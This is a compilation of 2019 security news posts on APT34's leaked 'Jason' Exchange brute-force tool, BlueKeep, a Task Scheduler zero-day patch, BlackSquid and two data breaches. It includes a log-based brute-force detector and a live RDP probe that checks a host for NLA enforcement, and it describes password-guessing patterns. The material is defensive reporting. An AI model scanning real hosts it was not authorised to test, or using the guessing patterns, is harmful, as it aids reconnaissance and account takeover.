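2019-06-03 10:15:03 10.0.0.5 GET /OAB/ - 443 - 203.0.113.7 ExchangeServicesClient/15.00.0913.015 401 2 5 8
2019-06-03 10:15:03 10.0.0.5 POST /EWS/Exchange.asmx - 443 - 203.0.113.7 ExchangeServicesClient/15.00.0913.015 401 1 2148074254 14
2019-06-03 10:15:04 10.0.0.5 POST /EWS/Exchange.asmx - 443 CORP\\alice 198.51.100.20 Microsoft+Office/16.0 200 0 0 33
2019-06-03 10:15:05 10.0.0.5 POST /EWS/Exchange.asmx - 443 - 198.51.100.20 Microsoft+Office/16.0 401 1 2148074254 10
2019-06-03 10:15:06 10.0.0.5 POST /EWS/Exchange.asmx - 443 CORP\\alice 198.51.100.20 Microsoft+Office/16.0 200 0 0 30
"""

# URI prefixes hit by the EWS and OAB brute-force modes (matched case-insensitively).
EXCHANGE_AUTH_PATHS = ("/ews/", "/oab/")


def parse_iis_w3c(text):
    """Yield one dict per record, keyed by the names in the most recent #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue                        # malformed or field-count mismatch: skip, do not crash
        yield dict(zip(fields, values))


def detect_exchange_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: summary} for clients with >= threshold 401s against EWS/OAB
    inside any `window`-long interval."""
    failures = defaultdict(list)
    agents = defaultdict(set)
    paths = defaultdict(set)
    for rec in parse_iis_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        if rec["sc-status"] != "401" or not stem.startswith(EXCHANGE_AUTH_PATHS):
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        ip = rec["c-ip"]
        failures[ip].append(ts)
        agents[ip].add(rec["cs(User-Agent)"])
        paths[ip].add(stem)

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):             # sliding window over the sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "failures": len(times),
                    "paths": sorted(paths[ip]),
                    "user_agents": sorted(agents[ip]),
                }
                break
    return alerts
```

A single user mistyping a password produces one or two 401s followed by a 200 from the same address, as `198.51.100.20` does above; the threshold and window separate that from a guessing run, and the recorded user agent tells an analyst whether the client was Outlook or a bare EWS Managed API binary.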

Jason Project GUI

Unpacking the ZIP container reveals the following artifacts. Jason.exe is the graphical user interface and the main visible tool. Microsoft.Exchange.WebService.dll, a Microsoft-developed library, provides the real functionality used by Jason.exe. PassSample includes some pattern implementations of possible passwords (i.e. [User@first]@@[user@first]123), and a folder named PasswordPatterns includes building blocks for password guessing. For example, it wraps up a file called Year.txt including numbers from 1900 to 2020, a file called numspecial.txt including special number patterns and special-character patterns, a file called num4.txt including numbers from 0 to 999 and from 0002 (why not 0001 or 0000?) to 9998 (why not 9999?), and finally a file called num4special.txt including special number patterns like 1234, 7890, 0707, and so on.

Leaked ZIP content

Digging a little into the two .NET artifacts, we find that both Jason.exe and Microsoft.Exchange.WebService.dll were written for the .NET Framework. The DLL provides a managed interface for developing .NET client applications that use EWS; by using the EWS Managed API, a developer can access almost all the information stored in an Office 365, Exchange Online, or Exchange Server mailbox. The attacker used an old version of Microsoft.Exchange.WebService.dll, tagged 15.0.0.0, which according to Microsoft documentation dates back to 2012.

WebService.dll assembly version

The last available Microsoft.Exchange.WebService.dll dates back to 2015, as shown in the following image, which might help date Jason, even if it is not irrefutable evidence.

Last Microsoft Exchange WebServices dll version dates to 2015

Analyzing the reversed byte-code, a real eye-catcher (at least from my personal point of view) is the “exception protection” that has been put in place. In other words, the developer used many checks, such as variable checks, null-byte avoidance, and object index and object key checks, in order to reduce the probability of unhandled software exceptions. These “exception protections” are usually adopted in two main scenarios: (i) the end user is not a very “techy” person, so he might end up in some unexpected conditions, or (ii) the attacker is a professional developer who is trained to write product-oriented code and not merely working software (which is what attackers usually do). The following images show a couple of code snippets where the developer decided to protect the code from unexpected user behavior.

Basic exception prevention 1
Basic exception prevention 2

Comparing the code style with my previous analyses of APT34 (OilRig), which you might find here and here, we observe similar code protection. Even if the language is different, the basic exception prevention in Jason is very close to that of, for example, the “ICAP.py script injection” function. Another weak similarity is in the logging style: Jason and, for example, the Glimpse project have a similar file-logging function, which builds strings by concatenation with special operators (no “flying casting” or “safe conversions”, i.e. “%s”) and writes one-line log entries at function focal points.

I am aware that these are weak similarities and that there is no additional evidence or tie to previously leaked APT34 tools other than the trusted source (Lab Dookhtegan), so I am not making any personal attribution, since it is very hard to attribute Jason directly to APT34 based on what is known.

On the other hand, the Jason project does not share its main source language with the tools in my previous APT34 analyses, it does not include DNS tricks or any evidence of DNS usage, it does not include distinguishing patterns or language mistakes, and it was recompiled in January 2019 but using older technology. As already discussed, it shares just a few code-style similarities with Glimpse and WebMask.

Additional technical details, including Yara Rules and IoCs, are reported in the original analysis published by Marco Ramilli on his blog:

https://marcoramilli.com/2019/06/06/apt34-jason-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I have also been in charge of testing the uVote voting system for the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the intelligence ecosystem. I decided to broaden my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing one of the most amazing cybersecurity defence centers I have ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing that Defence Belongs To Humans.

Edited by Pierluigi Paganini

(Security Affairs – Jason, APT34)



The post Analyzing the APT34’s Jason project appeared first on Security Affairs.

0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day

Experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

Security experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

A couple of weeks ago, the researcher SandboxEscaper released a working exploit for the vulnerability. Like the Windows zero-day disclosed in August, this new issue affects the Microsoft Windows Task Scheduler.

SandboxEscaper demonstrated that it is possible to trigger the Windows zero-day by crafting malformed legacy task files (.JOB format) and importing them into the Task Scheduler utility; such legacy tasks can still be added on newer versions of the operating system.

Every .JOB file is imported by the Task Scheduler with arbitrary DACL (discretionary access control list) control rights.

The experts pointed out that in the absence of the DACL, the system grants any user full access to the file.

The researcher explained that in order to trigger the flaw it is necessary to import legacy task files into the Task Scheduler on Windows 10.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

“Microsoft Windows contains a privilege escalation vulnerability in the way that the Task Scheduler SetJobFileSecurityByName() function is used, which can allow an authenticated attacker to gain SYSTEM privileges on an affected system.” wrote Dormann.

By recompiling the exploit code, Dormann was also able to reproduce the issue on 64-bit Windows 10 and on Windows Server 2016 and 2019; only on Windows 8 and 7 was it not possible to reproduce it.

“We have confirmed that the public exploit code functions reliably on 32- and 64-bit Windows 10 platforms, as well as Windows Server 2016 and Windows Server 2019.” continues Dormann. “While Windows 8 still contains this vulnerability, exploitation using the publicly-described technique is limited to files where the current user has write access, in our testing,”

According to the experts at 0patch, only the legacy schtasks.exe can be abused to escalate privileges. Unlike the legacy schtasks.exe, the modern Task Scheduler requires the user setting the task to have write permissions on a file in order to modify it.

“After some head-scratching, we remembered that this attack only works with the legacy schtasks.exe, and not with the new one. Could it be that the old schtasks.exe was calling some other RPC function than _SchSetRpcSecurity, which then in turn called _SchSetRpcSecurity via RPC?” reads the analysis published by 0patch.


The researchers discovered that the legacy schtasks.exe process, which runs with the attacker’s privileges, calls the RPC endpoint taskcomp!SASetAccountInformation in the Task Scheduler’s svchost.exe process (running as Local System), which in turn calls the RPC endpoint schedsvc!_SchRpcSetSecurity in the same svchost.exe (still running as Local System).

The experts found that taskcomp.dll, running with Local System privileges, impersonates itself (Local System) to enable the SeRestorePrivilege privilege, which it needs in order to set the DACL and ownership on any file.

“[W]e believe it was actually an error to impersonate self in taskcomp.dll instead of impersonating the client. The latter would in fact allow the security check in schedsvc!_SchRpcSetSecurity to perform correctly and work as intended on a regular file as well as on a hard-linked system file (correctly failing when invoked by a low-privileged user).” continues 0patch.

“We therefore decided to replace self-impersonation with client-impersonation, and to do that, we removed the call to ImpersonateSelfWithPrivilege and injected a call to RpcImpersonateClient in its place.”

Unfortunately, the exploit was still working, because taskcomp.dll makes another RPC call to SchRpcSetSecurity when the first RPC call fails. The experts at 0patch then completely removed the call to SetSecurity.

“After that, we got the desired behavior: The legacy schtasks.exe was behaving correctly when creating a new task from a job file, and […] the hard link trick no longer worked because the Task Scheduler process correctly identified the caller and determined that it doesn’t have sufficient permissions to change DACL or ownership on a system file,” continues 0patch. 

0patch released a micropatch to address the vulnerability on all Windows 10 systems running the 0patch Agent. The researchers explained that the micropatch does not modify schedsvc.dll, so the non-legacy Task Scheduler is not touched by it.

“As always, if you have 0patch Agent installed and registered, this micropatch is already on your computer – and applied to taskcomp.dll in your Task Scheduler service. If you don’t have the 0patch Agent yet, you can register a 0patch account and install it to get this micropatch applied.” concludes 0patch.

“Following our guidelines on which patches to provide for free, this micropatch affects many home and education users, and is therefore included in both FREE and PRO 0patch license until Microsoft provides an official fix. After that the micropatch will only be included in the PRO license.”

The micropatch released by 0patch works on fully updated:

  1. Windows 10 version 1809 32bit
  2. Windows 10 version 1809 64bit
  3. Windows Server 2019

Pierluigi Paganini

(SecurityAffairs – Task Scheduler, zero-day)


NSA urges Windows Users and admins to Patch BlueKeep flaw

The National Security Agency (NSA) is urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

Last week Microsoft issued a second security advisory to warn users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

Now the National Security Agency (NSA) is also urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

The vulnerability, tracked as CVE-2019-0708, impacts Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that malware authors could exploit to create malicious code with WannaCry-like propagation capabilities.

As explained by Microsoft, the vulnerability is wormable: it can be exploited without user interaction, making it possible for malware to spread in an uncontrolled way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Security experts believe it is only a matter of time before threat actors start exploiting it in the wild. A few hours ago, the security researcher Zǝɹosum0x0 announced that he has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

“The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows.” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”


In addition to installing the patches from Microsoft, Windows users can mitigate attacks:

  • Block TCP port 3389 at your firewalls, especially any perimeter firewalls exposed to the internet. This is the port used by the RDP protocol, and blocking it stops attempts to establish a connection.
  • Enable Network Level Authentication. This security improvement requires attackers to have valid credentials before they can reach the vulnerable code and attempt remote code execution.
  • Disable Remote Desktop Services if they are not required. Disabling unused and unneeded services helps reduce exposure to security vulnerabilities overall and is a best practice even without the BlueKeep threat.

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)


Tens of Million patients impacted by the AMCA data breach

Outsourced silos of personal info raided, at least 200,000 payment details swiped

American Medical Collection Agency (AMCA), a recovery agency for patient collections, suffered a data breach that could impact many of its customers.

American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers; the company still hasn’t disclosed details.

In a filing with the U.S. Securities and Exchange Commission (SEC), Quest Diagnostics revealed that the attackers broke into the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.


The security breach has impacted roughly 12 million Quest Diagnostics patients and roughly 7.7 million LabCorp patients. After the disclosure of the incident, LabCorp announced the termination of its business relationship with AMCA, and Quest Diagnostics suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

“LabCorp has referred approximately 7.7 million consumers to AMCA whose data was stored in the affected AMCA system. AMCA’s affected system included information provided by LabCorp.” reads the Form 8-K filing.

“That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance). LabCorp provided no ordered test, laboratory results, or diagnostic information to AMCA.”

AMCA confirmed that Social Security Numbers and insurance identification information are maintained for LabCorp consumers.

AMCA also informed LabCorp that it is sending security breach notices to approximately 200,000 LabCorp consumers whose financial data may have been compromised.

According to DataBreaches.net, the stolen data are already on sale on the dark web: researchers at Gemini Advisory discovered payment card information for roughly 200,000 individuals, likely from AMCA’s databases, offered on a well-known marketplace.

“The breach had been discovered by Gemini Advisory, who informed this site that they had found approximately 200,000 patients’ payment card info for sale on a well-known marketplace. The cards had apparently been compromised between September, 2018 and the beginning of March, 2019.” states DataBreaches.net.

Pierluigi Paganini

(SecurityAffairs – American Medical Collection Agency, hacking)


The Australian National University suffered a major, sophisticated attack

The Australian National University suffered a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The Australian National University was the victim of a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The top Australian university is known for its intense collaboration with Australia’s government and the national security services.

The university has estimated that over 200,000 people have been affected by the security breach. Vice-chancellor Brian Schmidt sent a message to the staff and students to notify them of the incident, he explained that threat actors illegally accessed the university’s systems in late 2018.

“We believe there was unauthorised access to significant amounts of personal staff, student and visitor data extending back 19 years,” Schmidt said. “We have no evidence that research work has been affected,”

“In late 2018, a sophisticated operator accessed our systems illegally. We detected the breach two weeks ago,”

Schmidt also added that exposed data included names, addresses, dates of birth, phone numbers, personal email addresses and emergency contact details, tax file numbers, payroll information, bank account details, passport details, and student academic records.

Financial data, medical records, police checks, workers’ compensation, vehicle registration numbers have not been affected.

The Australian National University reported the incident to the authorities and its partners and is currently investigating the attack with their support.

“We’re working closely with Australian government security agencies and industry security partners to investigate further.” added Schmidt.

“The University has taken immediate precautions to further strengthen our IT security and is working continuously to build on these precautions to reduce the risk of future intrusion.”

Universities are a privileged target for hackers, especially nation-state actors interested in spying on advanced research projects.

In June 2018, Chinese hackers breached the systems of the Australian National University (ANU) and, according to the experts, remained in its infrastructure even after the intrusion was discovered.

This time the authorities haven’t attributed the intrusion to a specific actor, but the events suggest the involvement of a sophisticated cyberespionage group.

Australian entities have been hit by several major attacks in recent years; in February, hackers broke into Australia’s Parliament computer network, and the ANU breach is just the latest in order of time.

In October 2016 a report published by the Australian Cyber Security Centre confirmed that the Australian Bureau of Meteorology hack was carried out by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The Bureau of Meteorology supercomputer targeted by the hackers is also used to provide weather data to defense agencies; its compromise could give a persistent attacker a significant advantage for numerous reasons.

Initial media reports blamed China for the cyber attack; in 2013 Chinese hackers were accused by the authorities of stealing the top-secret plans of Australia’s new intelligence agency headquarters.

Is China behind the latest attack on the Australian National University?

Pierluigi Paganini

(SecurityAffairs – Australian National University, hacking)


Expert developed a MetaSploit module for the BlueKeep flaw

A security expert has developed a Metasploit module to exploit the critical BlueKeep vulnerability and get remote code execution.

The security researcher Zǝɹosum0x0 has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The vulnerability, tracked as CVE-2019-0708, impacts Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that malware authors could exploit to create malicious code with WannaCry-like propagation capabilities.

As explained by Microsoft, the vulnerability is wormable: it can be exploited without user interaction, making it possible for malware to spread in an uncontrolled way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.
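Both BlueKeep posts on this page give the same advice: enable NLA so that an attacker needs valid credentials before reaching the vulnerable RDP code, and block TCP 3389 where it is not needed. Whether NLA is actually enforced on a host is observable from the first packet exchange of the RDP connection sequence (MS-RDPBCGR 2.2.1.1 and 2.2.1.2): a client that asks for standard RDP security only is refused with `HYBRID_REQUIRED_BY_SERVER` when NLA is mandatory, and accepted otherwise. The following is an added example, not Microsoft's, the NSA's or Zǝɹosum0x0's code: it builds that X.224 Connection Request, parses the Connection Confirm, and classifies the answer. The `build_connection_confirm` helper only exists to construct sample server replies for offline use; the routing cookie user name is arbitrary. A server that accepts standard RDP security is not necessarily unpatched, it is merely reachable pre-authentication, which is what makes the patch status matter.

```python
import socket
import struct

# Protocol identifiers from MS-RDPBCGR (RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE).
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0x0, 0x1, 0x2, 0x8
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols=PROTOCOL_RDP):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ. Asking for PROTOCOL_RDP alone
    tests whether the server will speak standard RDP security, i.e. without NLA."""
    cookie = b"Cookie: mstshash=probe\r\n"                          # routing cookie, name is arbitrary
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + cookie + neg_req    # CR code, dst-ref, src-ref, class 0
    x224 = bytes([len(x224)]) + x224                                 # LI counts the TPDU minus the LI byte
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224           # TPKT: version 3, reserved, length


def build_connection_confirm(neg_type, value):
    """Server-side Connection Confirm with an RDP_NEG_RSP or RDP_NEG_FAILURE; used here only to
    construct sample replies so the parser can be exercised offline."""
    neg = struct.pack("<BBHI", neg_type, 0, 8, value)
    x224 = struct.pack(">BHHB", 0xD0, 0, 0, 0) + neg                 # CC code, dst-ref, src-ref, class 0
    x224 = bytes([len(x224)]) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    li, code = data[4], data[5]
    if (code & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if tpkt_len != 4 + 1 + li or len(data) < tpkt_len:
        raise ValueError("truncated or inconsistent length fields")
    neg = data[11:tpkt_len]                     # optional rdpNegData after the 7-byte X.224 header
    if not neg:                                 # pre-negotiation server: standard RDP security only
        return {"type": "legacy", "selected_protocol": PROTOCOL_RDP}
    neg_type, _flags, _length, value = struct.unpack("<BBHI", neg[:8])
    if neg_type == TYPE_RDP_NEG_RSP:
        return {"type": "response", "selected_protocol": value}
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "failure_code": FAILURE_CODES.get(value, value)}
    raise ValueError(f"unexpected rdpNegData type {neg_type:#x}")


def classify(result):
    if result["type"] == "failure":
        if result["failure_code"] == "HYBRID_REQUIRED_BY_SERVER":
            return "NLA enforced: standard RDP security refused"
        return f"standard RDP security refused ({result['failure_code']}); NLA not confirmed"
    if result["selected_protocol"] == PROTOCOL_RDP:
        return "standard RDP security accepted: pre-auth RDP code reachable without credentials"
    return "server selected a protected security layer"


def probe(host, port=3389, timeout=5.0):
    """Live check against one host (network access required; not exercised by the tests)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request(PROTOCOL_RDP))
        return classify(parse_connection_confirm(s.recv(1024)))


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it against your own hosts before and after turning on "Allow connections only from computers running Remote Desktop with Network Level Authentication": the verdict should flip from "standard RDP security accepted" to "NLA enforced". A connection refused at the TCP level is the expected result where port 3389 has been blocked as the advisory recommends.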

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

Unfortunately, it has been determined that roughly one million devices exposed online are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.


Zǝɹosum0x0 also published a video PoC that shows how to exploit the BlueKeep vulnerability on a Windows Server 2008 system.

According to Zǝɹosum0x0, the module could be used also against machines running on Windows 7 and Server 2008 R2.

This Metasploit module doesn’t work against Windows Server 2003.

Zǝɹosum0x0 also developed a scanner Metasploit module for the CVE-2019-0708 BlueKeep RCE vulnerability.

At the end of May, Microsoft issued a second warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The NSA also issued an alert to urge users to install the security patches to address the BlueKeep flaw.

“The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows ” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”

Pierluigi Paganini

(SecurityAffairs – Metasploit, hacking)


The post Expert developed a MetaSploit module for the BlueKeep flaw appeared first on Security Affairs.

BlackSquid malware uses multiple exploits to drop cryptocurrency miners

A new piece of malware, dubbed BlackSquid, has appeared in the threat landscape; it targets web servers with several exploits to deliver cryptocurrency miners.

Security experts at Trend Micro have discovered a new Monero cryptocurrency miner, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.

The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.

According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.

“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”

The peculiarity of the BlackSquid malware is its use of a set of the most dangerous exploits.

While many forms of malicious code employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard.

The list of exploits used by the malware includes EternalBlue, DoublePulsar; exploits for CVE-2014-6287, Tomcat arbitrary file upload vulnerability CVE-2017-12615, CVE-2017-8464; and three ThinkPHP exploits for different versions of the framework.

The threat is delivered via infected webpages, exploits, or through removable or network drives.

BlackSquid leverages the GetTickCount API to randomly select web server IP addresses and then attempts to infect them.

The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.

“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.” continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”

The malware halts the infection routine if at least one of the following conditions is met:

  • The victim’s username is included in a list of common sandbox usernames;
  • The disk drive model is equal to one included in a specific list;
  • The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.

BlackSquid exploits the EternalBlue-DoublePulsar exploits (MS17-010 SMB RCE exploit) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same user rights as the local system user.

If the infected system has an Nvidia or AMD video card (the malware checks using WQL, the WMI Query Language, where WMI stands for Windows Management Instrumentation), the malicious code downloads a second component into the system to mine using graphics processing unit (GPU) resources.

Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.

The presence of coding errors and skipped routines suggests that BlackSquid is still in the process of development and testing.

“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.

“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages.”

Pierluigi Paganini

(SecurityAffairs – BlackSquid, hacking)

The post BlackSquid malware uses multiple exploits to drop cryptocurrency miners appeared first on Security Affairs.

CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions

A security expert disclosed technical details of a new unpatched vulnerability (CVE-2019-9510) that affects Microsoft Windows Remote Desktop Protocol (RDP).

Security expert Joe Tammariello of Carnegie Mellon University Software Engineering Institute (SEI), discovered a new unpatched vulnerability in Microsoft Windows Remote Desktop Protocol (RDP).

The flaw, tracked as CVE-2019-9510, could be exploited by client-side attackers to bypass the lock screen on remote desktop (RD) sessions.

In order to exploit the flaw, the attacker requires physical access to the targeted system; for this reason, it received a CVSS score of 4.6 (medium severity). The flaw affects versions of Windows starting with Windows 10 1803 and Server 2019.

The vulnerability resides in the way Microsoft Windows Remote Desktop feature requires clients to authenticate with Network Level Authentication (NLA).

“Microsoft Windows RDP Network Level Authentication can allow an attacker to bypass the lock screen on remote sessions.” reads the advisory published by the CERT/CC.

“Starting with Windows 10 1803 and Windows Server 2019, Windows RDP handling of NLA-based RDP sessions has changed in a way that can cause unexpected behavior with respect to session locking. If a network anomaly triggers a temporary RDP disconnect, upon automatic reconnection the RDP session will be restored to an unlocked state, regardless of how the remote system was left.”

When a network anomaly occurs, it could trigger a temporary RDP disconnect, but upon automatic reconnection the RDP session will be restored to an unlocked state, regardless of the status of the remote system before the disconnection. Below is the attack scenario described by the CERT:

  • User connects to remote Windows 10 1803 or Server 2019 or newer system using RDP.
  • User locks remote desktop session.
  • User leaves the physical vicinity of the system being used as an RDP client.

An attacker can then interrupt the network connectivity of the RDP client system; this will cause the session with the remote system to be unlocked without any credentials being provided.

The advisory published by the CERT/CC states that two-factor authentication systems that integrate with the Windows login screen (e.g. Duo Security MFA) could be bypassed by exploiting the CVE-2019-9510 flaw.

“Two-factor authentication systems that integrate with the Windows login screen, such as Duo Security MFA, are also bypassed using this mechanism. Any login banners enforced by an organization will also be bypassed.” continues the advisory.

The CERT/CC suggests the following workarounds:

  • Lock the local system as opposed to the remote system.
  • RDP sessions should be disconnected rather than locked to invalidate the current session and prevent an automatic RDP session reconnection without credentials.

Tammariello reported the flaw to Microsoft on April 19, but the company did not acknowledge it as a vulnerability.

“[The] behavior does not meet the Microsoft Security Servicing Criteria for Windows,” states the company.

Pierluigi Paganini

(SecurityAffairs – RDP, CVE-2019-9510)

The post CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions appeared first on Security Affairs.

OilRig’s Jason email hacking tool leaked online

A few hours ago, a new email hacking tool dubbed Jason and associated with the OilRig APT group was leaked through the same Telegram channel used to leak other tools.

A new email hacking tool associated with the Iran-linked OilRig APT group was leaked through the same Telegram channel that in April leaked the source code of 6 tools used by the crew.

In April, a hacker group that goes online by the name Lab Dookhtegan disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRig, APT34, and HelixKitten. The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

Now the group released a tool that was allegedly used by OilRig “for hacking emails and stealing information.”

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The new tool, dubbed Jason, could be used to hijack Microsoft Exchange email accounts, and currently it has a detection rate of 0 on VirusTotal.

Jason email hijacking

The Jason email hijacking tool is used by threat actors to carry out brute-force attacks using a dictionary of password samples and four text files containing numerical patterns.

According to VirusTotal the sample was compiled in 2015 and at the time of writing it is detected only by 7 out of 71 antivirus solutions.

Jason email hijacking detection

The leak of the hacking tools allowed security firms to analyze them and implement rules for their detection.

On the other hand, hackers could use these tools to carry out attacks, making attribution harder.

You can find further info on the Jason tool in a blog post published by Omri Segev Moyal, the co-founder at Minerva Labs.


